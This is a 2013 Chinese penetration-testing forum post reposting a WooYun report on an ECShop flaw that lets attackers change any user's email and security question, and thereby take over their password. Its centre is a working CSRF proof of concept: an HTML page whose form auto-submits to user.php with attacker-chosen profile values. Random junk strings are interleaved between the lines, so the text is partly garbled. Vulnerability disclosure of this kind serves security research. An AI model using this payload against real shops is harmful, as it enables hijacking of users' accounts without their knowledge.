中国网络渗透测试联盟
标题:
ecshop修改任意用户密码漏洞的CSRF利用
[打印本页]
作者:
admin
时间:
2013-2-20 08:30
标题:
ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
$ f3 G) Y( `1 L# D
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
. e' c% B2 J# k; z% }
* {' L- `* W$ {; K
Demo For:
http://www.wooyun.org/bug.php?action=view&id=395
8 v6 `+ x, N) F, p* g. _
1 }1 m9 W: g" p9 Y& `' V
详细说明:
' n2 f/ u7 K7 B" y/ y
利用csrf和xss可以突破官方所说的“障碍”
7 \, h# o( t- ^" f
xss版本已经有人说明
+ G4 A9 M2 m- [% \9 L9 D
这里给出csrf版本
. K4 ?- O1 U9 u
: f ~# W1 Z2 l, g- @
漏洞证明:
, b) K" ~& r: L, L
<html>
3 d) m, @. t0 A+ J: `$ ^/ W" K
<body>
2 u" m8 ]$ q! W! U$ i
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
/ [; L. v& H1 A5 e3 S! f
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
, S! m. F; E: Y+ D, I( o
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
* Y! ]/ c& K, m2 M- i
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
5 l1 H* M6 r) F/ o3 P. U
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
. G% }+ v# Y! S/ c8 U5 d
</body>
- w# S, Q2 J# O; V* V K: X) K/ X
<script>
" A, L( z& N/ @& b: k( G7 i
document.forms[0].submit();
" E" c) {$ j4 J0 v9 T- [% Z
</script>
8 k; }. d6 }1 B
</html>
2 _, u0 ^0 S9 Q& Q$ N
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
: [: k9 v- D4 n0 n1 q+ H4 B
, A/ q+ {& R2 X& u& O
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2